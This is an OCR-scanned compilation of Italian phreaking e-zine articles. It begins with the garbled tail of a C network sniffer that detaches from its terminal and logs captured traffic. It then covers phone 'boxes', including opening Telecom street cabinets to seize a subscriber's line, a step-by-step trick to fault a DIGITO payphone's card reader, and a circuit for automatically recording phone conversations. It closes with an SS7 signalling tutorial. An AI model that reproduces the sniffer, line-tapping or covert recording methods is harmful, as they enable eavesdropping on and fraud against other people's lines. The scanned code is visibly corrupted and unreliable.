if(stremp(pwd,crypt(buf,pwd))) 
exit(1); 

} 
Si 

void main(argc, argv) 

int argc; 

char **argv; 

{ 
char cbuf[BUFSIZ]; 


struct ifconf ifc; 
int s, 
ac=1, 
backg=0; 


ProgName=argv[0]; 
/*  getauth(); */ 


LOG=NULL; 
device=NULL; 
while((ac<argc) && (argv[ac][0] == '-')) { 
register char ch = argv[ac++][1]; 
switch(toupper(ch)) { 
case 'T': device=argv[ac++]; 
break; 
case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a"))) 
Zexit(1, "Output file cant be opened\n"); 
break; 
case 'B': backg=1; 
break; 
case 'D': debug=1; 
break; 
default : fprintf(ERR, 
"Usage: %s [-b] [-d] [-i interface] [-f file]\n", 
ProgName); 
exit(1); 
} 
} 


if(!device) { 
if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) 
Pexit(1,"Eth: socket"); 


ifc.ifc_len = sizeof(cbuf); 

ifc.ifc_buf = cbuf; 

if(ioctl(s, SIOCGIFCONE, (char *)&ifc) < 0) 
Pexit(1,"Eth: ioctl"); 


close(s); 
device = ifc.ifc_reg->ifr_name; 
} 
fprintf(ERR, "Using logical device %s [%s]\n",device, NIT_DEV); 
fprintf(ERR, "Output to %s.%s%s",(LOG)?LogName:"stdout", 
(debug)?" (debug)":"" (backg)?" Backgrounding ":"\n"); 


if(ILOG) 


LOG=stdout; 


signal(SIGINT, death); 
signal(SIGTERM, death); 
signal(SIGKILL, death); 
signal(SIGQUIT, death); 


if(backg && debug) { 
fprintf(ERR,"[Cannot bg with debug on]\n"); 
backg=0; 

} 


if(backg) { 
register int S; 


if((s=fork())>0) { 
fprintf(ERR,"[pid %d]\n",s); 
exit(0); 

} else if(s<0) 
Pexit(1,"fork"); 


if( (s=open("/dev/tty",O_RDWR))>0 ) { 
ioctl(s,TIOCNOTTY (char *)NULL); 
close(s); 
} 
} 
fprintf(LOG,"\nLog started at => %s [pid %d]n",NOWtm(), getpid()); 
fflush(LOG); 


do_it(); 


IL BOXING 


COSA FACCIAMO OGGI AL 
NOSTRO AMATO TELEFONO? 


ovvero piccola guida al "disturbo" dei telefoni pubblici di 
++++++Master of Puppets++++++ 


Discuteremo ora di ciò che non potete fare ad un telefono 
pubblico: c'è un pò troppo caos, a quanto ho visto, e mi sembra 
giusto spiegare quali tecniche sono da relegare alla storia del 
phreaking. 

Le tecniche che analizzerò sono le seguenti: 


Boxing 

Punching 

Lo switch sotto al display 
Storie varie con le monete 
Tessere telefoniche 

Danni al telefono 


Boxa tu, che io ho altro da fare 

Bene, anzi, male, perchè il boxing è stato il cavallo di battaglia 
del phreaking per una cifra di tempo, e adesso, invece, di 
questo cavallo non ne è rimasta che colla. 

Questo è anche colpa, comunque, di tutti quei coglioni che 
hanno comprato una Blue per chiamare gratis, e hanno 
accellerato la mano di mamma Telecom nel rimodernare i 
propri sistemi. Quanti di questi erano Phreakers? Nessuno 
credo capisse come funzionasse la scatoletta magica. 

Quante Box avevamo in gioco? Veramente troppe, ma le più 
famose sono sicuramente la Blue e la Red box, la Green, che 
altro non era che un mix delle prime due, e la beige box. 

La Blue box non faceva altro che imitare i toni di servizio 
della linea ( ve lo dovevo dire io?), in Italia ha avuto una vita 
brevissima, ma era sicura, perchè a differenza di altri stati 
non ti tracciavano dopo quattro minuti di stranezze rilevate 
sulla linea. 

Non si può più usare, lo sapevate, no? I sistemi telefonici 
italiani sono, come dire, un pò cambiati, quindi scordatevi, 
cari, di downlodarvi da internet uno schema di Blue (peraltro 
introvabile) e di usarlo, anche perchè i telefoni, ormai, sono 
costruiti con filtri atti a bloccare certe frequenze... 

La Red box imitava invece il rumore delle monetine che 
infilavi nel telefono: mi spiego, metti 100 lire? alla centrale 
viene inviato il suono di frequenza XXX. 

A parte che il concetto di base era lo stesso della blue (ma qui 
non ti tracciavano ) e quindi oggi totalmente superato, tutti i 


progetti di red box venivano dagli USA, dove, guarda caso, le 
monetine, e i telefoni, sono diversi dai nostri..... 

vi lascio tirare le vostre conclusioni, aggiungendo che io, ai 
tempi, mica c'ero arrivato, e adesso (anche prima) ho un bel 
soprammobile inutile. 

Della Green non ne parlo neppure.... 

La piccola Beige Box non è altro che il lineman handset, il 
telefono con i coccodrilli degli omini Telecom. Nulla di 
speciale, un telefono normalissimo, e una box che anche un 
handicappato saprebbe costruirsi. 

Questa funziona, ma cosa potete farci? 

Prendete uno degli armadi grigi Telecom, uno di quelli dove 
vedete ogni tanto gli omini lavorare, e apritelo a vostra 
discrezione. Dentro trovate una marea di ponticelli. se vi 
attaccate voi , a uno di questi, avrete commesso un reato mica 
da ridere (come se scardinare l'armadio non lo sia), avrete 
occupato una linea d'utente. Cosa fare ora? A parte non farvi 
sgamare dalla pula, vedete un pò voi.... 

Non sperate di collegarvi alla linea di un telefono pubblico 
perchè non funziona, ho provato sulla mia pelle, prima dal 
telefono pubblico a scuola, poi da un telefono pubblico dove 
lavoro.... beh, la linea del coso è controllata, e due telefoni 
connessi alla stessa linea non sono una cosa poi tanto 
normale. 

P.iS. 

Se dovete telefonare, e trovate un bel lucchetto al telefono di 
casa, staccate la spina e sbattete nei buchi la vostra Beige... 
pulito, indolore, a meno che non ci sia anche la tabulazione del 
traffico. 


Morale della favola: Se volete boxare, ma non vi piace il naso 
rotto e i guantoni, fatelo in beige, che quest' anno va pure di 
moda... 


I TELEFONI DIGITO 


Da circa un paio di mesi, mamma telekom sta rimpiazzando i vecchi telefoni 
pubblici arancioni, con dei nuovi telefoni dalla linea estetica accativante 

ed attraente. Su questi telefoni se ne sono dette molte [e pure io in qualche 
occasione ho detto qualcosa] alcune delle quali devono ancora trovare una 
risposta. Ecco il motivo del mio articolo: piazzare le basi sull'informazione 

di questi telefoni, in modo che chiunque possa ampliarle con la propria 
esperienza. Proprio per questo motivo, andrò a ripetere cose già dette, ma 
[forse] non scontate per chiunque... quindi non rompetemi i coglioni venendomi 
a dire che sono stato ripetitivo ! 


Personalmente, il nuovo telefono pubblico "DIGITO" [così si chiama] l'ho 
visto prima alla smau, poi in funzione nella mia città. Senza dilunguarmi 
troppo, vado ad elencare qui di seguito tutte le info di cui dispongo... 
elencando per ognuna i vari commenti fatti da varie persone in rete: 


- Il design è stato fatto da Giugiaro e l'intero scatolotto di dimensioni di 
circa 30 cm x 40 cm è interamente fatto in acciaio stagnato, ragion percui 
sono propenso a credere che sarà più difficile portarsene a casa uno, 
rispetto ai precedenti. Solamente la cornetta è in plastica dura. 


> No comment. 


- La tastiera è alfanumerica in quanto si possono anche inviare SMS, e in più 

ci sono altri tasti che sulle vecchie cabine non c'erano e sono: 

* il tasto per selezionare la lingua (infatti questo esisteva già!) 

* il tasto per alzare/abbassare il volume 

* il tasto canc ... tipo calcolatrice, che elimina l'ultimo numero 

* il tasto R.... non è il repeat del numero, ma serve a riprendersi il 
segnale di libero 

* il tasto in/out per la scheda telefonica 

* il tasto OK 

* due piccoli tasti, posti sotto il display, da loro funzionamento ancora 
ingoto (credo che servano per gli SMS o qualcosa del genere... quindi 
dovremmo aspettare le schede a chip) 


> Anche qui non c'è da dire molto. L'unica cosa ancora ingota [a me] è il 
funzionamento dei due piccoli tasti posti sotto al display. 


- Il display ha 4 righe e il trucco dell'overflow di 0 non funzia più. 
Il numero massimo di cifre che si possono inserire [quelle che compongono 
il numero telefonico] è 25. 


- Per le comunicazioni utilizza una linea ISDN :), ed è supportato dalla 
Piattaforma di Rete Intelligente :( . 


> Il nome di Rete Intelligente si è dato quando si sono cominciate ad usare 
le tessere telefoniche, o meglio quando hanno installato dei database 
contenenti tutti i numeri seriali delle tessere telefoniche e il loro 
rispettivo credito, in modo da scalarlo anche nel database oltre che 
sulla scheda. Inoltre, questa Rete permette anche di differenziare le 
tariffe delle chiamate a seconda della destinazione. 


- Il lettore di schede non ha più la classica entrata per le schede sopra, e 
l'uscita sotto, infatti è composto di una sola fessura per schede; proprio 
per questo motivo permette di cambiare la scheda mentre si sta conversando 
senza dover agganciare. 


> In dettaglio: 
Dunque, da quello che ho potuto capire, il lettore di schede di 'ste 
cabine è più cazzuto dei vecchi. Infatti dovrebbe funzionare così: voi 
inserite la scheda, e lui non se la "succhia" tutta, ma la accetta fino a 
metà. A questo punto controlla se ciò che avete inserito è una scheda che 
lui riconosce, o meno: se la riconosce (ovvero è delle sue) la prende 
tutta, altrimenti la "sputa" fuori, dicendovi di riagganciare. 


> Per quanto riguarda il cambio della scheda, ecco quello che ho potuto 
constatare: 
Quando il vostro credito arriva a 1000 Lire o ad una cifra inferiore, il 
telefono vi darà la possibilità di cambiare scheda. Per cambiare scheda 
dovete premere l'ultimo pulsante in basso, a sinistra della tastiera; 
così facendo esce la scheda telefonica e avete 16 secondi [circa] di 
tempo per inserirne un'altra. A voi la fantasia su come utilizzare questo 
"lungo" tempo ;) 


- Per quanto riguarda le schede, funziona sia con le schede telekom a banda 
magnetica che con le smartcard iso 7816 disponibili da dicembre 2000, con 
allegati una serie di servizi di personalizzazione particolari, di cui 
nessuno ha saputo dirmi niente e successivamente anche con monete euro (ma 
sarà poi un altro modello). 


> Vagabondando in rete, da qualche parte, mi è capitato di vedere che il 
telefono è strutturato in due parti: una fissa, dedicata alle schede, e 
una parte opzionale per la gestione delle monete, in euro, credo [ma 
questa parte opzionale la vedremo fra un po']. 


- C'è la possibilità di usufruire di vari servizi innovativi molto 
interessanti, del tipo: 


* Possibilità di lasciare dei messaggi vocali, che verranno inviati una 
volta riagganciato l'apparecchio, verso i clienti assenti o occupati; 


* Servizio di casella vocale personale, dove chiunque e da qualsiasi 


numero, avrà la possibilità di lasciare un messaggio; 
(e qui credo che centri la personalizzazione delle smart card ;) 


- Servizio ASSURDO: una porta infrarossi per collegare portatili e palmtop 
direttamente in rete (tipo presa telefonica stradale pubblica). E penso che 
questo sia il vero punto che merita di essere approfondito, in fatto di 
interfacciamento di un pc col telefono. 

N.B. Questa info l'ho presa dai volantini pubblicitari che i telecomici 
distribuivano alla smau. 


> Questo è quanto sono venuto a sapere io; dal momento che l'ho reso 
pubblico sono affiorati i primi commenti e le prime critiche. C'è chi ha 
detto [giustamente] che di una porta IRDA non se ne vede l'ombra: bè, se 

è vero che è presente una porta ad infrarossi, non credo che la mettano 

bene in vista... servirebbe solo a vandali [???] per danneggiarla, no ?! 

A questo punto esistono solo due casi possibili e una soluzione; i due 

casi sono 1) c'è 2) non c'è. Ma va ?! Eheeh... e la soluzione: aprire un 

rotor e vedere cosa c'è realmente al suon interno. 

Ponendo il caso che sia vero, è altrettanto inaspettata la affermazione 

che da questo telefono pubblico ci si possa collegare in rete. Ecco cosa 

mi è stato detto: 

[ ...diffiderei di cio'...e se fosse un mega complotto x inkiappettarci 
tutti?! Insomma...mi suona strano..smartcard ( sanno palesemente ke si 
possono clonare! vero anke ke pero' si sono fatti i konti in taska e 
avran detto ke ci guadagnano kmq sopra... perdere mezzo miliardo di 
nostre telefonate a frodo non e' ke gliene fotta mooooolto ). 

...poi c'e' la porta per kollegare il palmare o il picci'...dite ke non 
c'avranno pensato a kualke folle, kome noi del resto ;) , ke gioka a 
far splittare per 3 ore irc.tin.it? o kualke altro mega attakko? ] 


Non posso dire che ciò che mi è stato detto non sia vero, ma non escluderei 
cmq il fatto della porta IRDA e del collegamento in rete. 


- Altra cosa innovativa è il metodo di come fa a riagganciare il telefono. Mi 
spiego: avete presente la levetta sulla quale le ormai vecchie cabine 
poggiano la cornetta innescando il riaggancio? Bene, sono scomparse. Credo 
che il riaggancio sia innescato magneticamente, in quanto la superficie di 
appoggio è diversa da quella dell'intero scatolotto e la cornetta forse 
pesa leggermente di più. 


> Sì, il riaggancio è magnetico... sto già studiando qualcosina. 


- Infine ho la chicca delle chicche. Siccome questo telefono è stato 
progettato per essere posto anche in quei luoghi dove, a causa della loro 
posizione geografica, non possono essere raggiunti da una linea fissa, al 
loro interno hanno due alloggi per sim card in modo da funzionare via GSM 
sui 900Mhz. Questa feature delle nuove cabine è molto interessante, anche 


se comporta un grosso svantaggio, e cioè che i rotor potrebbero essere 
rintracciabili con uno strumento tipo il GPS. Quindi fate molta attenzione, 
se avete idea di portarvene a casa una! 


> Anche qui le solite critiche... lo sò. Anche A ME SUONA MOLTO STRANO, ma 
questo è quando sono venuto a sapere. Quindi, NON prendetelo come buono, 
ma sappiate che può esistere la possibilità che queste cabine siano 
rintracciabili dal punto di vista di locazione geografica. 


- Infine, dal punto di vista "hardware", tutto ciò che sò è: 
* Hanno una batteria da 6v, che dovrebbe alimentare anche le ipotetiche sim. 


* Ha 2 grossi bocchettoni per attaccarci i 2 slave, un plug femmina tipo ISDN 
con 4 canali (le vecchie erano 2, come le isdn tradizionale), 2 tasti di 
reset, e un pulsantino per il test del lettore. 
E poi resta fuori un plug femmina... che non si collega da nessuna parte. 
Il plug femmina potrebbe essere per una eventuale periferica... tipo il 
tanto discusso modem/fax isdn. 


E la porta IRDA? Non c'è. Ovvero non c'è ancora, in quanto resta anche uno 
slave piccolino, a 16 pin; questo "potrebbe" essere per una eventuale porta 
IRDA opzionale. 


MINI GUIDA AGLI ERRORI DELLE CABINE: 


FRODE - Ah, questa è bella: se voi inserite una carta telefonica al contrario, 
o inserite una qualsiasi carta che lui non riconosce, vi compare sul 
display la scritta "Frode" e nella linea sotto "Riagganciare" 


CONGESTIONE - Dopo 10 min che smanettavo, scrivendo numeri assurdi, mi è 
venuto fuori questa scritta: "Congestione" e nella linea sotto 
"Riagganciare". 

Se qualcuno di voi sai qualcosa, me lo faccia sapere 


TILT DELLE CABINE DIGITO... 


Poco tempo fa, parlando in IRC con MrBison, è venuto fuori un discorso 
abbastanza interessante che riguarda come mandare in tilt queste nuove cabine. 
La tecnica, da lui escogitata, funziona e non funziona, in quanto viene 
visualizzato il messaggio "Lettore fuori uso", ma poi basta sganciare e 
riagganciare per fare rifunzionare il tutto. Comunque, ecco qua i passaggi: 


1) Inserire una scheda a rovescio, oppure inserire un'altra scheda che lui 
non legge, ma che riesca ad entrare. 


Appena inserita esce scritto "Frode" 


2) Rimettere la scheda dentro, tenendola premuta, spingendo sulla fessura del 
lettore. Ogni volta che lui ti sputa fuori la scheda, tu spingila dentro, 
continuando ad alzare e abbassare la cornetta, finche non ti viene scritto: 
"Chiamata E&M attivata" 


3) A questo punto continua sempre a fare le operazioni descritte nel punto "2" 
ovvero tieni la scheda nel lettore con forza e continua ad agganciare e 
sganciare, finche non ti viene scritto: 

"Lettore fuori uso" 
"Solo chiamate d'emergenza" 
"Sganciare" 


A questo punto la cornetta è agganciata, la tua scheda è dentro e il telefono 
dice di non funzionare... peccato, appena si sgancia e riaggancia la cornetta 
il telefono riprende a funzionare perfettamente, sputando la scheda. 


CIRCUITO PER L'AUTOMAZIONE DI REGISTRAZIONI TELEFONICHE 


Con questo semplicissimo schema elettrico è possibile costruirsi un circuito in grado di pilotare 
direttamente un normale registratore a microcassette per registrare le conversazioni sulla linea 
telefonica a cui è collegato. Ogni qualvolta sarà alzata la cornetta del telefono collegato alla linea il 
registratore entrerà in funzione registrando ogni cosa (compresi i toni DTMF) fino a che la cornetta non 
sarà abbassata. Il registratore da utilizzare deve essere munito di presa Remote e di un'ingresso Micro. 
Ovviamente l'uscita LINE OUT andrà collegata all'ingresso del registratore mentre i contatti del Relè 
andranno collegati alla presa Remote del registratore che dovrà essere posizionato sempre su Rec. Se 
non riuscite a trovare un registratore che abbia questa presa potete prenderne uno qualsiasi, smontarlo e 
interrompere il cavetto positivo (rosso) che esce dal vano delle batterie ed arriva alla scheda del 
registratore. Collegate alle estremità del cavetto tagliato due spezzoni di filo che collegherete poi ai poli 
del relè. Così la corrente delle batterie passerà al registratore solo a cornetta alzata. 


PHONE 
LINE 
(RED) 


REMOTE 


PHONE 
LINE 
(WHITE) 


LINE OUT 


Elenco Componenti 
R1=100k 

R2=10k 

R3=47k 

R4=100k 

R5=22k 

C1=47kpF poliestere 250V 
D1=1N4148 
D2=1N4148 
D3=1N4007 
D4=1N4007 
DZ1=zener 18volt 1W 
VR=varistore 120V 
TR1=BF391 


TR2=BF391 
RELE=Reed da 5V 


SS7 TUTORIAL (1a e 2a parte) 
ti [ Various Artists ]--[]-------------------------- * 


InFO hUnTeRz : CancermaN ( 3a parte ) 
BsThack (2a parte ) 
...e zio sP3nKy ( 1a parte ) 


Dedicato agli " smanettoni dei telefoni " : 
Gouranga , zapotecz, [Pcrk], 
Cancerman,BsThack ,mR_bls0n, 
Martyr che penso sia crepato 
e in particolar modo alla 
dolcissima anarkika rancida, 
alla pikkola anarko-elis4, 
Yoghi&michell9 (auguri!) , 
lili1(:*)e alla donna che 
e'il detonatore dell'en- 
tropia e mia frenetica 
silfide..elsa288! 


Un Bacione a tutti..anke alla JaMMina, smav, DanteAlig, NObodY e ad Adryana 
che se non mi faceva girare i coyoni non ci saremmo potuti conoscere :******* 


*Il Suo Teskio e' Una Bandiera Che Vuol Dire Liberta'* 


Non mailate per sfotterci del fatto che cio' che diciamo e' puramente 
riciclato da www.microlegend.com ...perche' e' cosi! :) 


Se invece abbiamo detto un mare di bufalate skorreggiateci..eteci! :) 
sp3nky@freemail.it 
- Una semplicissima infarinata. 


Il Common Channel Signaling System No.7 (anche chiamato ss7 o c7) 

e' il protocollo standard della telecomunicazione mondiale, stabilito 
dall'International Telecommunication Union ( ITU ) e dalla Telecommunication 
Standardization Sector ( ITU-T ). Lo standard definisce le procedure e il 
protocollo dai quali gli elementi nei Public Switched Telephone Network 

( PSTN ) scambiano informazioni attraverso un network ( una stazione 
telefonica che segnala digitalmente ) per effettuare chiamate su cellulari 

( wireless = senza fili ) e telefoni fissi ( wireline = con fili ), routing e 

per controllo. 


Si sono create nel tempo pero' delle varianti come l'American National 
Standard Institute ( ANSI ), Bell Communications Reasearch usati in 
Nord America e l'European Telecommunications Standards Institute 

( ETSI ) usato in Europa. 


I network e il protocollo ss7 sono usati quindi per : 


-> Innanzi tutto per la compatibilita' telefonica mondiale e 
sikurezza. 

-> Servizi gratuiti ( es. numeri verdi : 800-123456 ) e servizi 
" wireline " ( quindi telefoni fissi ). 

-> Tante altre cazzate. 


- I Signaling Links. 


Le informazioni nel sistema ss7 viaggiano tra base e base ad una velocita' di 
56kb/s o 64 kb/s su canali bidirezionali (cio'significa che il messaggio puo' 
viaggiare da A a B e da Bad A) chiamati signaling links ( collegamento 
tramite segnale ). 

Capita che i segnali viaggino fuori-banda ( Out-Of-Band ) anziche' in banda. 


Cio' xke' : 


-> Un uso + efficiente dei circuiti vocali. 

-> Il supporto della rete intelligente ( Intelligent Network ), 
quella che in Italia viene usata per i telefoni pubblici. 

-> Contro un fraudolento uso del sistema telefonico..hehehe ;) 

-> Perche' esistiamo noi apatici assetati di sapere. 

-> Per complicarci a tutti la vita. 


- Signaling Points. 


Ogni signaling points ( punto di segnalazione )e'identificato unicamente da 

un codice chiamato Point Code. Questi codici sono trasportati nei " signaling 
messages "( ovvero le informazioni che si scambiano i punto di segnalazione ) 
da signaling points a signaling points per identificare l'origine e la 
destinazione di questi messaggi. 


Ci sono 3 tipi si Signaling Points nel sistema ss7 : 


-> SSP ( Service Switching Point ) 
-> STP ( Signal Transfer Point ) 
-> SCP ( Service Control Point ) 


...@® Ora osservate la foto vietata ai minori dei 345 anni (luce) : 
Figura 1. 


Gli SSp sono dei punti del sistema ss7 che originano o terminano chiamate. 
Un SSp manda " segnaling messages " agli altri SSp per impostare, dirigere e 
"liberare" i circuiti vocali richiesti per terminare una chiamata. 

Un SSp potrebbe mandare un messaggio "query" al database centrale ( che 
sarebbe l'SCp ) per capire come minchia deve routare la chiamata...cioe' dove 
la deve inoltrare...così l'SCp manda un mess (..all'SSp che gli ha rotto i 
coyoni ;) kontenente una lista di numeri da chiamare, se trova il primo 
occupato oppure se non risponde l'SSp chiama quello dopo e cosi' via..questo 


avviene per esempio con i numeri verdi ( toll-free )..mbhe'almeno in Nord 
America e' cosi' !! Cmq questa " procedura " varia da servizio a servizio e 
da network a network. 


Il traffico network che c'e' fra signaling point e signaling point potrebbe 
essere routato per via di un " packet switch " ( pacchetto instradato ) dopo 
aver contattato un STp che routa a sua volta ogni messaggio entrante su dei 
signaling links esterni ( che si basano sull'informazioni contenute nel 
messaggio ss7 ). Affinche' avvenga questo, l'STp provvede nella migliore 
utilizzazione del network SS7 con l'eliminazione del bisogno per i diretti 
collegamenti fra signaling points e signaling points. 

Un STp potrebbe effettuare un Global Title Translation...una procedura dalla 
quale la destinazione del signaling point e' determinata dalle cifre presenti 
nel signaling message ( es. se e' un 034x-xxxxxxx l'STp contattera' un 
determinato signaling point...se invece e' un 800-xxxxxx ne verra' contattato 
un altro ). 

L'STp può inoltre comportarsi da "firewall" per monitorare i messaggi ss7 
scambiati con altri network. 


Dato che il procedimento network ss7 per fare le chiamate e' critico, gli SCp 
e gli STp sono di solito ubicati in diversi posti materiali ma con comuni 
configurazioni affinche' si ha un sicuro servizio del sistema in caso di 
problemi tecnici. 

Il traffico e' diviso attraverso i link nel linkset ( cioe' attraverso tutti 

i link disponibili del sistema...insomma..sulle basi d'appoggio libere ). 


Se uno dei link fallisce il traffico viene riinstradato su un altro link 
disponibile nel linkset. Il protocollo ss7 provvede sia alla correzione degli 
errori sia all'abilita' di retrasmissione per garantire la funzionalita' nel 
caso di eventuali problemi su signaling point o su link. 


- Tipi di Signaling Links nel sistema ss7. 


I signaling link sono organizzati in link ke vanno dal tipo link A al tipo 
link F. 


Figura 2. 


TERE TE ra sesno ittici poine di errrosiii acne + 
Un Link A ( access ) connette un signaling end point ( SCp | 
o SSp )a un ST p. Solo i messaggi ke vengono originati dal | 
Link A | o destinati a un SCp o SSp vengono trasmessi su link A | 


Un Link B ( bridge ) connette un STp a un altro STp. Gene- | 
ralmente un quadrangolo di link B connettono tra di loro | 
Link B | uguali o primari STp ( es.l'STp di un network con l'STp di | 
un altro network ). Il link B e' molto simile al D e vengo-| 

no kiamati B\D. | 

tese let laziont ceri crrrce icialà + 


Un Link C ( cross ) connette gli STp performando funzioni | 
identike. Gli SCp sono disposti anke assieme per migliore | 
Link C | l'affidabilita'. | 


Un Link D ( diagonal ) connette un STp secondario pari | 
all'STp primario nel quad-link (la konfigurazione a 4 STp).| 
Link D | Gli STp secondari all'interno dello stesso network sono | 
connessi tramite te un quad di link D. | 


Un Link E ( extended ) connette un SSp ad un altro STp. | 


Link E | | 


Un Link F ( fully associated ) connette due signaling end | 
point. I link F non sono di solito usati nei network con | 

Link F | l'STp. Nei network senza STp, i link sono direttamente kol-| 
legati ai signaling point. | 


Spara SERIES E IRIS RE SISI NICO SEE SEE SOLE SI ICAO + 
- SS7 Protocol Stack. 


Le funzioni hardware e software nel sistema SS7 sono divise in livelli. 
Ekko una mappa approssimativa dell'OSI ( Open Systems Interconnect ) 


Figura 3. 

- Message Transfer Part. 

La Parte di Trasporto del Messaggio (MTP) è divisa in tre livelli: 
- MTP Livello 1. 


Il livello più basso, MTP Livello 1, è equivalente all'OSI Physical Layer 
(Strato fisico OSI). MTP Livello 1 definisce le caratteristiche fisiche, 
elettriche, e funzionali del collegamento con segnale digitale. Le interfacce 
fisiche definite includono E-1 (2048 kb/s; 32 canali a 64 kb/s), DS-1 (1544 
kb/s; 24 canali a 64 kp/s), V.35 (64 kb/s), DS-0 (64 kb/s), e DS-0A (56 kb/s). 


- MTP Livello 2. 


MTP Livello 2 assicura un'accurata trasmissione da circuito a circuito di un 
messaggio attraverso un collegamento di segnale. Il livello 2 implementa 
controllo di flusso, validazione della sequenza del messaggio, e controllo 
per errori. Quando avviene un errore in un collegamento di segnale, il 
messaggio (o il set di messaggi) è ritrasmesso. 


MTP Livello 2 è equivalente all'OSI Data Link Layer (Strato collegamento dati 
OS). 

Un messaggio SS7 è chiamato un'unità di segnale (SU). 

Ci sono 3 tipi di unità di segnale: 

Unità di segnale di compilazione [Fill-In Signal Units (FISUs)], Unità di 
segnale di stato di collegamento [Link Status Signal Units (LSSUSs)], e Unità 
di segnale di messaggio [Message Signal Units (MSUs)] 


Figura 4. 


Le unità di segnale di compilazione (FISUSs) sono trasmesse continuamente su 
un collegamento di segnale in entrambe le direzioni finchè altre unità di 
segnale (MSUs o LSSUs) sono presenti. FISUs portano solo informazioni di 
livello basico 2 (per esempio, riconoscimento di unità di segnale ricevuta da 
un punto di segnale remoto). Poiché una somma di controllo CRC è calcolato 
per ciascuna unità di segnale di compilazione (FISU), la qualità del 
collegamento di segnale è controllata continuamente da entrambi i punti di 
segnale a ciascuna fine del collegamento.(Nota: Nella variante dell'ITU-T 
giapponese, la qualità del segnale dicollegamento è controllata dalla continua 
trasmissione di flag octets (8-bit bytes) piuttosto che dalle FISU; le unità 

di segnale di compilazione (FISU) sono mandate solo a intervalli di tempo 
predefiniti (per esempio una volta ogni 150 millisecondi). 


Le unità di segnale di stato di collegamento (LSSUSs) portano uno o due 
ottetti (8-bit bytes) di informazione sullo stato di collegamento tra i punti 
di segnale a ogni fine di collegamento. Lo stato di collegamento è usato per 
controllare l'allineamento del collegamento e per indicare lo stato di un 
punto di segnale (per esempio, il periodo di interruzione dell'uso del 
processore) al punto di segnale remoto. 


Le Unità di segnale di messaggio (MSUs) portano tutto il controllo della 
chiamata, il database della richiesta e della risposta, l'organizzazione 

della rete, e i dati del mantenimento della rete nel campo delle informazioni 

di segnale(SIF). Le MSUs hanno un' etichetta di instradamento che permette al 
punto che origina il segnale di inviare informazioni al punto di segnale 
destinazione attraverso la rete. 

Il valore dell'LI (Indicatore di lunghezza) determina il tipo di unità di 

segnale: 


LI Valore 0 Unità di segnale di compilazione (FISU)1..2 Unità di segnale di 
stato del collegamento (LSSU)3..63 Unità di segnale di messaggio (MSU). 


- Message Type Length Indicator Value(s). 


Il 6-bit LI può registrare valori tra zero e 63. Se il numero di ottetti che 
segue l'LI e che precede il CRC è meno di 63, l'LI contiene questo numero. 
Altrimenti, l' LI è settato a 63. Un LI di 63 indica la lunghezza del 
messaggio è uguale o più grande di 63 ottetti (fino a un massimo di 273 
ottetti). La massima lunghezza di un'unità di segnale è 279 ottetti: 273 
ottetti (dati) + 1 ottetto (flag) + 1 ottetto (BSN + BIB) + 1 ottetto 


(FSN + FIB) + 1 ottetto (LI + 2 bits liberi) + 2 ottetti (CRC). 
- Flag. 


Il valore binario del flag è 0111 1110. Prima di trasmettere un'unità di 

segnale, MTP Livello 2 rimuove "i falsi flag" aggiungendo uno 0-bit dopo ogni 
sequenza di cinque 1-bit. Ricevendo u'unità di segnale e togliendo il flag, 

MTP Livello 2 rimuove qualsiasi 0-bit seguendo una sequenza di cinque 1-bit 
per ripristinare il contenuto originale del messaggio. I flag doppi sono 

rimossi attraverso unità di segnale. 


BSN (Sequenza del numero a ritroso) 

La BSN è usata per mettere a conoscenza del ricevimento di unità di segnale 
dal punto di segnale remoto. La BSN contiene la sequenza del numero 
dell'unità di segnale che è stata riconosciuta. (vedi sotto FIB.) 


- BIB (indicatore di bit al contrario). 


Il BIB indica un riconoscimento negativo dal punto di segnale remoto quando 
interrotto. (vedi sotto FIB.) 


FSN (Sequenza di Numeri in avanzamento) 
La FSN contiene la sequenza di numeri dell'unità di segnale. (vedi sotto FIB.) 


- FIB (Indicatore di Bit in avanzamento). 


Il FIB è usato per recuperare gli errori come il BIB. Quando un'unità di 

segnale è pronta per la trsmissione, il punto di segnale incrementa l'FSN 
(forward sequence number) di 1 (FSN = 0..127). Il valore del CRC (ciclico 
controllo di redondanza) checksum è calcolato e apposto al seguente messaggio. 


Ricevendo il messaggio, il punto di segnale remoto controlla il CRC e copia i 
valori dell' FSN nel BSN del prossimo messaggio disponibile organizzato per 
la trasmissione indietro al punto di segnale di partenza. Se il CRC è 

corretto, il messaggio di ritorno è trasmesso. Se non è corretto, il punto di 
segnale remoto indica un riconoscimento negativo attivando il BIB a mandare 
indietro il messaggio. Quando il punto di segnale originante riceve un 
riconoscimento negativo, ritrasmette tutti i messaggi seguenti, iniziando dal 
messaggio corrotto, con il FIB inserito. 

Siccome il 7-bit FSN può riportare valori tra zero e 127, un punto di segnale 
può mandare fino a 128 unità di segnale prima di richiedere riconoscimento 
dal punto di segnale remoto. La BSN indica l'ultima sequenza di unità di 
segnale ricevuta correttamente dal punto di segnale remoto. La BSN mette a 
conoscenza anche di tutte le unità di segnale ricevute precedentemente. Per 
esempio, se un punto di segnale riceve un'unità di segnale con BSN = 5 
seguito da un altro con BSN = 10 (e il BIB non è inserito), il secondo BSN 
implica una ricevuta corretta di unità di segnale 6 anche attraverso 9. 


- SIO (Ottetto di Servizio Informazioni). 


Il SIO in un MSU contiene il campo di sottoservizio a 4-bit seguito 
dall'indicatore di servizio a 4-bit. Le FISU e le LSSU non contengono un SIO. 
Il campo di sottoservizio contiene l'indicatore di rete (per esempio 
nazionale o internazionale) e la priorità del messaggio (0..3 con 3 che è la 
priorità più alta). La priorità del messaggio è considerata solo sotto 
condizioni di congestione, non per controllare l'ordine con cui i messaggi 
sono trasmessi. I messaggi di bassa priorità possono essere eliminati durante 
i periodi di congestione. I messaggi di test del collegamento del segnale 
ricevono una più alta priorità piuttosto che i messaggi di preparazione alla 
chiamata. 

L' indicatore di servizio specifica l'utente MTP, permettendo così la 
decodificazione dell'informazione contenuta nel SIF. 


- SIF (Campo di Informazione del segnale). 


Il SIF in un MSU contiene l' etichetta di instradamento e l'informazione di 
segnale (per esempio, SCCP, TCAP, e i messaggi dati ISUP). Le LSSU e le FISU 
non contengono né un'etichetta di instradamento, nè un SIO poiché sono 

mandate tra due punti di segnale direttamente collegati. Per più informazioni 
riguardo le etichette di instradamento, bisogna fare riferimento alla 

descrizione dell'MTP Livello 3 che segue. 

CRC (Cyclic Redundancy Check - Controllo Ciclico di Redondanza) 

Il valore del CRC è usata per trovare e correggere gli errori di trasmissione. 

